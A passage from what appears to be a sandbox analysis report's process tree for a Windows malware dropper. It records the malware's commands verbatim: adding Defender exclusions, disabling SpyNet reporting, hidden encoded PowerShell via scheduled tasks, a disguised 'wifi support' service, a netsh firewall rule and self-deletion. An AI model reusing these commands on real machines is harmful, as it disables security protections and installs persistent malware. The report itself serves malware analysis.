PID:38820

C:\Users\Admin\Pictures\Adobe Films\ws3RzBSjG5YLeEUrkaSLPWVu.exe
"C:\Users\Admin\Pictures\Adobe Films\ws3RzBSjG5YLeEUrkaSLPWVu.exe"
5⤵
PID:1104

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "" "Get-WmiObject Win32_PortConnector"
6⤵
PID:54600

C:\Users\Admin\Pictures\Adobe Films\Uc6ZgBGpLkBogm1vh9cZf2Vb.exe
"C:\Users\Admin\Pictures\Adobe Films\Uc6ZgBGpLkBogm1vh9cZf2Vb.exe"
5⤵
PID:2276

C:\Users\Admin\Pictures\Adobe Films\t6TiYt6cfBYCRCp_eADZT8EU.exe
"C:\Users\Admin\Pictures\Adobe Films\t6TiYt6cfBYCRCp_eADZT8EU.exe"
5⤵
PID:4112

C:\Users\Admin\Documents\Y6aDiEKFbUw5I1R5KSqVQirk.exe
"C:\Users\Admin\Documents\Y6aDiEKFbUw5I1R5KSqVQirk.exe"
6⤵
PID:81780

C:\Users\Admin\Pictures\Adobe Films\edUlTZUyCtldqy5Se9vbcYMJ.exe
"C:\Users\Admin\Pictures\Adobe Films\edUlTZUyCtldqy5Se9vbcYMJ.exe"
7⤵
PID:47380

C:\Users\Admin\Pictures\Adobe Films\edUlTZUyCtldqy5Se9vbcYMJ.exe
"C:\Users\Admin\Pictures\Adobe Films\edUlTZUyCtldqy5Se9vbcYMJ.exe"
8⤵
PID:82596

C:\Users\Admin\Pictures\Adobe Films\edUlTZUyCtldqy5Se9vbcYMJ.exe
"C:\Users\Admin\Pictures\Adobe Films\edUlTZUyCtldqy5Se9vbcYMJ.exe"
8⤵
PID:57932

C:\Users\Admin\Pictures\Adobe Films\SfvskPtqfqEbOOCdhkM0Hp0b.exe
"C:\Users\Admin\Pictures\Adobe Films\SfvskPtqfqEbOOCdhkM0Hp0b.exe"
7⤵
PID:40140

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "" "Get-WmiObject Win32_PortConnector"
8⤵
PID:8600

C:\Users\Admin\Pictures\Adobe Films\BXzEGPNY9VuKroJ7t1TLJDhN.exe
"C:\Users\Admin\Pictures\Adobe Films\BXzEGPNY9VuKroJ7t1TLJDhN.exe"
7⤵
PID:82056

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\STOREM~2.EXE
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\STOREM~2.EXE
8⤵
PID:82724

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA1AA==
9⤵
PID:5044

C:\Users\Admin\Pictures\Adobe Films\HBHA4TuUO4HxHenPxEP8aGkB.exe
"C:\Users\Admin\Pictures\Adobe Films\HBHA4TuUO4HxHenPxEP8aGkB.exe"
7⤵
PID:82152

C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\System32\msiexec.exe" /Y .\LwFbRE.cE
8⤵
PID:82468

C:\Users\Admin\Pictures\Adobe Films\UoU4TpMWFdpEzKbmL3qlK6YI.exe
"C:\Users\Admin\Pictures\Adobe Films\UoU4TpMWFdpEzKbmL3qlK6YI.exe"
7⤵
PID:81868

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 81868 -s 1232
8⤵
- Program crash
PID:8696

C:\Users\Admin\Pictures\Adobe Films\e4U9eGNNue67d9SPGMuNhTC8.exe
"C:\Users\Admin\Pictures\Adobe Films\e4U9eGNNue67d9SPGMuNhTC8.exe"
7⤵
PID:81684

C:\Windows\SysWOW64\at.exe
at at at at at at at at at at at at at at at at at at at
8⤵
PID:82432

C:\Windows\SysWOW64\cmd.exe
cmd /c cmd < Lt.aifc & ping -n 5 localhost
8⤵
PID:73652

C:\Windows\SysWOW64\cmd.exe
cmd
9⤵
PID:4884

C:\Users\Admin\Pictures\Adobe Films\aaxy5khpaEjJBfrtdGdF0EM8.exe
"C:\Users\Admin\Pictures\Adobe Films\aaxy5khpaEjJBfrtdGdF0EM8.exe" /SP-/VERYSILENT /SUPPRESSMSGBOXES /INSTALLERSHOWNELSEWHERE /pid=747
7⤵
PID:82140

C:\Users\Admin\AppData\Local\Temp\is-HAU5U.tmp\aaxy5khpaEjJBfrtdGdF0EM8.tmp
"C:\Users\Admin\AppData\Local\Temp\is-HAU5U.tmp\aaxy5khpaEjJBfrtdGdF0EM8.tmp" /SL5="$70270,11860388,791040,C:\Users\Admin\Pictures\Adobe Films\aaxy5khpaEjJBfrtdGdF0EM8.exe" /SP-/VERYSILENT /SUPPRESSMSGBOXES /INSTALLERSHOWNELSEWHERE /pid=747
8⤵
PID:82492

C:\Users\Admin\Pictures\Adobe Films\Pfe9kuyv5U3lzQR0mmPO4GjA.exe
"C:\Users\Admin\Pictures\Adobe Films\Pfe9kuyv5U3lzQR0mmPO4GjA.exe"
7⤵
PID:81820

C:\Users\Admin\AppData\Local\Temp\7zS4707.tmp\Install.exe
.\Install.exe
8⤵
PID:82508

C:\Users\Admin\AppData\Local\Temp\7zS5C83.tmp\Install.exe
.\Install.exe /S /site_id "525403"
9⤵
PID:82228

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
10⤵
PID:5092

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
11⤵
PID:2900

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
12⤵
PID:2724

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
12⤵
PID:5244

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
10⤵
PID:1588

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
11⤵
PID:4840

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
12⤵
PID:3168

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
12⤵
PID:5264

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gFkKcaZcn" /SC once /ST 14:06:07 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
10⤵
- Creates scheduled task(s)
PID:4004

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gFkKcaZcn"
10⤵
PID:5300

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gFkKcaZcn"
10⤵
PID:9036

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bKFjthDDlmdmBdSpYV" /SC once /ST 17:49:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\LcMDsXLSmMLmtBGQR\VXuqdfXGxZocYTe\mSNAQzy.exe\" JF /site_id 525403 /S" /V1 /F
10⤵
- Creates scheduled task(s)
PID:1364

C:\Users\Admin\Pictures\Adobe Films\_LfejiaUpASRlleI3bTba2yT.exe
"C:\Users\Admin\Pictures\Adobe Films\_LfejiaUpASRlleI3bTba2yT.exe"
7⤵
PID:81848

C:\Users\Admin\Pictures\Adobe Films\hd7mTPAyBN4J7qrYLLrpcHFm.exe
"C:\Users\Admin\Pictures\Adobe Films\hd7mTPAyBN4J7qrYLLrpcHFm.exe"
7⤵
PID:26500

C:\Users\Admin\AppData\Local\Temp\is-PB5OF.tmp\hd7mTPAyBN4J7qrYLLrpcHFm.tmp
"C:\Users\Admin\AppData\Local\Temp\is-PB5OF.tmp\hd7mTPAyBN4J7qrYLLrpcHFm.tmp" /SL5="$9027C,254182,170496,C:\Users\Admin\Pictures\Adobe Films\hd7mTPAyBN4J7qrYLLrpcHFm.exe"
8⤵
PID:81992

C:\Users\Admin\AppData\Local\Temp\is-K2ANG.tmp\PowerOff.exe
"C:\Users\Admin\AppData\Local\Temp\is-K2ANG.tmp\PowerOff.exe" /S /UID=95
9⤵
PID:4832

C:\Users\Admin\AppData\Local\Temp\d4-990f9-5da-b34ae-800036befffe3\ZHazholaepica.exe
"C:\Users\Admin\AppData\Local\Temp\d4-990f9-5da-b34ae-800036befffe3\ZHazholaepica.exe"
10⤵
PID:4224

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\s22apw55.c4y\GcleanerEU.exe /eufive & exit
11⤵
PID:6576

C:\Users\Admin\AppData\Local\Temp\s22apw55.c4y\GcleanerEU.exe
C:\Users\Admin\AppData\Local\Temp\s22apw55.c4y\GcleanerEU.exe /eufive
12⤵
PID:6892

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6892 -s 452
13⤵
- Program crash
PID:8056

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6892 -s 764
13⤵
- Program crash
PID:8412

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6892 -s 784
13⤵
- Program crash
PID:8540

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6892 -s 784
13⤵
- Program crash
PID:8852

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6892 -s 764
13⤵
- Program crash
PID:8956

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6892 -s 852
13⤵
- Program crash
PID:9156

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6892 -s 1028
13⤵
- Program crash
PID:9368

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qxg0nrxq.maj\gcleaner.exe /mixfive & exit
11⤵
PID:6728

C:\Users\Admin\AppData\Local\Temp\qxg0nrxq.maj\gcleaner.exe
C:\Users\Admin\AppData\Local\Temp\qxg0nrxq.maj\gcleaner.exe /mixfive
12⤵
PID:7112

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7112 -s 452
13⤵
- Program crash
PID:8344

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7112 -s 764
13⤵
- Program crash
PID:8864

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7112 -s 804
13⤵
- Program crash
PID:9056

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7112 -s 788
13⤵
- Program crash
PID:9276

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7112 -s 796
13⤵
- Program crash
PID:9424

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gbt5b4ib.xbd\random.exe & exit
11⤵
PID:6872

C:\Users\Admin\AppData\Local\Temp\gbt5b4ib.xbd\random.exe
C:\Users\Admin\AppData\Local\Temp\gbt5b4ib.xbd\random.exe
12⤵
PID:7276

C:\Users\Admin\AppData\Local\Temp\gbt5b4ib.xbd\random.exe
"C:\Users\Admin\AppData\Local\Temp\gbt5b4ib.xbd\random.exe" -q
13⤵
PID:7952

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4mw2bojt.uvf\pb1117.exe & exit
11⤵
PID:6964

C:\Users\Admin\AppData\Local\Temp\4mw2bojt.uvf\pb1117.exe
C:\Users\Admin\AppData\Local\Temp\4mw2bojt.uvf\pb1117.exe
12⤵
PID:7520

C:\Users\Admin\AppData\Local\Temp\cf-33f51-98d-f4ba2-e66da0a0dd1bd\Bejaefuqemi.exe
"C:\Users\Admin\AppData\Local\Temp\cf-33f51-98d-f4ba2-e66da0a0dd1bd\Bejaefuqemi.exe"
10⤵
PID:4268

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
11⤵
PID:6812

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9ba8246f8,0x7ff9ba824708,0x7ff9ba824718
12⤵
PID:6836

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2204,11913993977559387843,6843053510669809443,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2192 /prefetch:2
12⤵
PID:7244

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2204,11913993977559387843,6843053510669809443,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2284 /prefetch:3
12⤵
PID:7264

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2204,11913993977559387843,6843053510669809443,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2848 /prefetch:8
12⤵
PID:7300

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,11913993977559387843,6843053510669809443,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1
12⤵
PID:7536

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,11913993977559387843,6843053510669809443,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3376 /prefetch:1
12⤵
PID:7576

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2204,11913993977559387843,6843053510669809443,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4468 /prefetch:8
12⤵
PID:7796

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,11913993977559387843,6843053510669809443,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5556 /prefetch:1
12⤵
PID:8112

C:\Users\Admin\Pictures\Adobe Films\PtjTrrOaLvTSY1qui6v8H5sg.exe
"C:\Users\Admin\Pictures\Adobe Films\PtjTrrOaLvTSY1qui6v8H5sg.exe"
7⤵
PID:3772

C:\Users\Admin\Pictures\Adobe Films\23mRiniiopWrAC7zPr6n5BuL.exe
"C:\Users\Admin\Pictures\Adobe Films\23mRiniiopWrAC7zPr6n5BuL.exe"
7⤵
PID:1360

C:\Users\Admin\AppData\Local\Temp\is-991KE.tmp\is-05MRC.tmp
"C:\Users\Admin\AppData\Local\Temp\is-991KE.tmp\is-05MRC.tmp" /SL4 $3025E "C:\Users\Admin\Pictures\Adobe Films\23mRiniiopWrAC7zPr6n5BuL.exe" 2115285 52736
8⤵
PID:82080

C:\Users\Admin\Pictures\Adobe Films\ISJf0lPrEGL_O8Z6_IVu_CFs.exe
"C:\Users\Admin\Pictures\Adobe Films\ISJf0lPrEGL_O8Z6_IVu_CFs.exe"
7⤵
PID:27420

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
6⤵
- Creates scheduled task(s)
PID:81820

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
6⤵
- Creates scheduled task(s)
PID:81848

C:\Users\Admin\Pictures\Adobe Films\QCJbXJSUl70q89lIhoofmhHU.exe
"C:\Users\Admin\Pictures\Adobe Films\QCJbXJSUl70q89lIhoofmhHU.exe"
5⤵
PID:1408

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
6⤵
PID:17224

C:\Users\Admin\Pictures\Adobe Films\TuaRYvg0gzrpNvrWf0TXBIZM.exe
"C:\Users\Admin\Pictures\Adobe Films\TuaRYvg0gzrpNvrWf0TXBIZM.exe"
5⤵
PID:4692

C:\Users\Admin\Pictures\Adobe Films\iHs3hc2_cAO_pKl584SA2pfU.exe
"C:\Users\Admin\Pictures\Adobe Films\iHs3hc2_cAO_pKl584SA2pfU.exe"
5⤵
PID:2648

C:\Users\Admin\AppData\Local\Temp\630621331-Fb5r2RP0gvHri990.exe
"C:\Users\Admin\AppData\Local\Temp\630621331-Fb5r2RP0gvHri990.exe"
6⤵
PID:49688

C:\Users\Admin\Pictures\Adobe Films\b8NKSWwKtCkOn8A6hSu9q_Nb.exe
"C:\Users\Admin\Pictures\Adobe Films\b8NKSWwKtCkOn8A6hSu9q_Nb.exe"
5⤵
PID:2768

C:\ProgramData\98648650520833584021.exe
"C:\ProgramData\98648650520833584021.exe"
6⤵
PID:82780

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\FilesH.bat" "
7⤵
PID:82916

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Steam.exe
8⤵
- Kills process with taskkill
PID:82172

C:\Windows\SysWOW64\timeout.exe
timeout /t 1
8⤵
- Delays execution with timeout.exe
PID:82848

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Cert.exe
"C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Cert.exe"
7⤵
PID:7120

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\b8NKSWwKtCkOn8A6hSu9q_Nb.exe" & exit
6⤵
PID:82832

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
7⤵
- Delays execution with timeout.exe
PID:81984

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 2028
6⤵
- Program crash
PID:82924

C:\Users\Admin\Pictures\Adobe Films\R4f1gXBrm4EE2NeS_8jX6e3C.exe
"C:\Users\Admin\Pictures\Adobe Films\R4f1gXBrm4EE2NeS_8jX6e3C.exe"
5⤵
PID:3736

C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\System32\msiexec.exe" /Y .\LwFbRE.cE
6⤵
PID:25448

C:\Users\Admin\Pictures\Adobe Films\bMKWccUjfCpRQTzCgoIRSMAg.exe
"C:\Users\Admin\Pictures\Adobe Films\bMKWccUjfCpRQTzCgoIRSMAg.exe"
5⤵
PID:448

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
6⤵
PID:81620

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 448 -s 77248
6⤵
- Program crash
PID:81856

C:\Users\Admin\Pictures\Adobe Films\OhAqYQiCXZEVkhmIgypf4k0Z.exe
"C:\Users\Admin\Pictures\Adobe Films\OhAqYQiCXZEVkhmIgypf4k0Z.exe"
5⤵
PID:3496

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\euesrkhr\
6⤵
PID:81700

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\bqebuawz.exe" C:\Windows\SysWOW64\euesrkhr\
6⤵
PID:81888

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" create euesrkhr binPath= "C:\Windows\SysWOW64\euesrkhr\bqebuawz.exe /d\"C:\Users\Admin\Pictures\Adobe Films\OhAqYQiCXZEVkhmIgypf4k0Z.exe\"" type= own start= auto DisplayName= "wifi support"
6⤵
- Launches sc.exe
PID:40492

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" description euesrkhr "wifi internet conection"
6⤵
- Launches sc.exe
PID:82004

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start euesrkhr
6⤵
- Launches sc.exe
PID:82160

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
6⤵
- Modifies Windows Firewall
PID:82380

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3496 -s 1192
6⤵
- Program crash
PID:82476

C:\Users\Admin\Pictures\Adobe Films\Dd57LjHlu5Qcy5x4fmaSHwTd.exe
"C:\Users\Admin\Pictures\Adobe Films\Dd57LjHlu5Qcy5x4fmaSHwTd.exe"
5⤵
PID:4568

C:\Users\Admin\Pictures\Adobe Films\SluG2zp8o6xpVL7X5AKjrsUb.exe
"C:\Users\Admin\Pictures\Adobe Films\SluG2zp8o6xpVL7X5AKjrsUb.exe"
5⤵
PID:3164

C:\Users\Admin\AppData\Local\Temp\is-7O0L0.tmp\is-1BKE8.tmp
"C:\Users\Admin\AppData\Local\Temp\is-7O0L0.tmp\is-1BKE8.tmp" /SL4 $1501E6 "C:\Users\Admin\Pictures\Adobe Films\SluG2zp8o6xpVL7X5AKjrsUb.exe" 2115285 52736
6⤵
PID:5984

C:\Program Files (x86)\evSearcher\evsearcher59.exe
"C:\Program Files (x86)\evSearcher\evsearcher59.exe"
7⤵
PID:23040

C:\Users\Admin\AppData\Roaming\{d6dc608d-2a27-11ed-a0e3-806e6f6e6963}\HSkvkD.exe
8⤵
PID:57872

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "evsearcher59.exe" /f & erase "C:\Program Files (x86)\evSearcher\evsearcher59.exe" & exit
8⤵
PID:2316

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "evsearcher59.exe" /f
9⤵
- Kills process with taskkill
PID:5184

C:\Users\Admin\Pictures\Adobe Films\TCcCil_tHUixdqQ7bCHgb6xu.exe
"C:\Users\Admin\Pictures\Adobe Films\TCcCil_tHUixdqQ7bCHgb6xu.exe"
5⤵
PID:1684

C:\Users\Admin\AppData\Local\Temp\389268854-Fb5r2RP0gvHri990.exe
"C:\Users\Admin\AppData\Local\Temp\389268854-Fb5r2RP0gvHri990.exe"
6⤵
PID:52520

C:\Users\Admin\Pictures\Adobe Films\rYEBEIHF4pNTEYifD2K9fKlq.exe
"C:\Users\Admin\Pictures\Adobe Films\rYEBEIHF4pNTEYifD2K9fKlq.exe"
5⤵
PID:3552

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
6⤵
PID:40156

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun16d537c60c.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:1440

C:\Users\Admin\AppData\Local\Temp\7zS4A90F0B6\Sun16d537c60c.exe
Sun16d537c60c.exe
4⤵
- Executes dropped EXE
PID:4948

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3624 -s 580
3⤵
- Program crash
PID:1996

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 388 -p 3624 -ip 3624
1⤵
PID:2504

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 2568 -ip 2568
1⤵
PID:4604

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 448 -ip 448
1⤵
PID:81728

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
1⤵
PID:82032

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 82032 -s 604
2⤵
- Program crash
PID:82200

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
1⤵
- Process spawned unexpected child process
PID:82020

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 82032 -ip 82032
1⤵
PID:82120

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 3496 -ip 3496
1⤵
PID:82420

C:\Windows\SysWOW64\euesrkhr\bqebuawz.exe
C:\Windows\SysWOW64\euesrkhr\bqebuawz.exe /d"C:\Users\Admin\Pictures\Adobe Films\OhAqYQiCXZEVkhmIgypf4k0Z.exe"
1⤵
PID:82436

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2768 -ip 2768
1⤵
PID:82848

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:6400

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:7560

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 6892 -ip 6892
1⤵
PID:8000

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 7112 -ip 7112
1⤵
PID:8296

C:\Windows\SysWOW64\WerFault.exe
